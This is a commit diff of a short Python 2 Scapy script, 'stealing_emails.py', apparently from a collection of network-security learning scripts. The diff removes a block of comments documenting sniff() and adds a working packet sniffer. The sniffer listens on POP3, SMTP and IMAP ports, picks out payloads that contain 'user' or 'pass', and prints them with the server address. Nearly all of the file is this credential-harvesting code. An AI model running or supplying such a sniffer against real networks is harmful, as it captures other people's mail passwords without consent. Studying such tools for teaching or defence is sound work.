some scapy scripts

Network_and_802.11/scapy/stealing_emails.py

@@ -5,26 +5,22 @@ __author__ = "bt3"
 ''' A simple sniffer to capture SMTP, POP3, IMAP credentials'''
 
 
-''''
-DOCUMENTATION:
-# sniffer that dissects and dumps the packets out
-# filter allows to specify a BPF, wireshark style to packets,
-# for example, to sniff all HTTP packets you use a BPF filter of tcp
-# and port 80
-# iface parameter tells the sniffer which network interface to sniff on
-# prn parameter specifies a callback function to every packet that matches the filter
-# and it will receive packet as its single parameter
-# count specifies how many packets you want to sniff (blank: infinite)
-sniff(filter'', iface='any', prn=function, count=N)
-'''
-
-
 from scapy.all import *
 
 # our packet callback
 def packet_callback(packet):
-    print packet.show()
-
-# fire up the sniffer
+    # check to make sure it has a data payload
+    if packet[TCP].payload:
+        mail_packet = str(packet[TCP].payload)
+        if 'user' in mail_packet.lower() or 'pass' in mail_packet.lower():
+            print '[*] Server: %s' % packet[IP].dst
+            print '[*] %s' %packet[TCP].payload
+
+
+
+# fire up the sniffer on all interfaces, with no filtering
+# store 0 ensures that the packets are not kept in memory (good when
+# leaving a long term sniffer running, so wont consume too much ram)
+sniff(filter="tcp port 110 or tcp port 25 or tcp port 143", prn=packet_callback, store=0)